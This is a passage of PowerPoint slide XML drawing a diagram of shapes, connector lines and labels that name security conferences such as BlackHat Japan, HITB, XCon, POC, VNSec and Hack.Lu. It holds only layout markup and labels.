                <a:off x="2394" y="3236"/>
                <a:ext cx="64" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>2</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35968" name="Rectangle 502"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2426" y="3236"/>
                <a:ext cx="422" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>H Conference</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35969" name="Rectangle 503"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5171" y="2074"/>
                <a:ext cx="242" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35970" name="Rectangle 504"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5171" y="2074"/>
                <a:ext cx="242" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35971" name="Line 505"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4767" y="2157"/>
                <a:ext cx="525" cy="161"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35972" name="Rectangle 506"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5232" y="2079"/>
                <a:ext cx="166" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>POC</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35973" name="Rectangle 507"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5068" y="2524"/>
                <a:ext cx="303" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35974" name="Rectangle 508"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5068" y="2524"/>
                <a:ext cx="303" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35975" name="Line 509"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4460" y="2606"/>
                <a:ext cx="759" cy="131"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35976" name="Rectangle 510"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5130" y="2527"/>
                <a:ext cx="224" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>VNSec</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35977" name="Rectangle 511"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5068" y="2374"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35978" name="Rectangle 512"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5068" y="2374"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35979" name="Line 513"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4961" y="2342"/>
                <a:ext cx="379" cy="32"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35980" name="Rectangle 514"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5141" y="2378"/>
                <a:ext cx="481" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>BlackHat Japan</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35981" name="Rectangle 515"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4767" y="2526"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35982" name="Rectangle 516"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4767" y="2526"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35983" name="Line 517"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4528" y="2419"/>
                <a:ext cx="360" cy="107"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35984" name="Rectangle 518"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4815" y="2532"/>
                <a:ext cx="187" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>XCon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35985" name="Rectangle 519"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920" y="2675"/>
                <a:ext cx="251" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35986" name="Rectangle 520"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920" y="2675"/>
                <a:ext cx="251" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35987" name="Line 521"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4353" y="2757"/>
                <a:ext cx="692" cy="133"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35988" name="Rectangle 522"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4981" y="2682"/>
                <a:ext cx="176" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>HITB</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35989" name="Rectangle 523"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2644" y="1063"/>
                <a:ext cx="489" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35990" name="Rectangle 524"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2644" y="1063"/>
                <a:ext cx="489" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35991" name="Line 525"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2888" y="1145"/>
                <a:ext cx="164" cy="830"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35992" name="Rectangle 526"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2688" y="1066"/>
                <a:ext cx="481" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>IT Underground</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35993" name="Rectangle 527"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2089" y="2576"/>
                <a:ext cx="347" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35994" name="Rectangle 528"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2089" y="2576"/>
                <a:ext cx="347" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35995" name="Line 529"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2262" y="2008"/>
                <a:ext cx="570" cy="568"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35996" name="Rectangle 530"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2159" y="2580"/>
                <a:ext cx="176" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Hack</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35997" name="Rectangle 531"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2287" y="2580"/>
                <a:ext cx="43" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>.</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35998" name="Rectangle 532"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2303" y="2580"/>
                <a:ext cx="96" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Lu</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35999" name="Rectangle 533"/>
              <p:cNvSpPr>
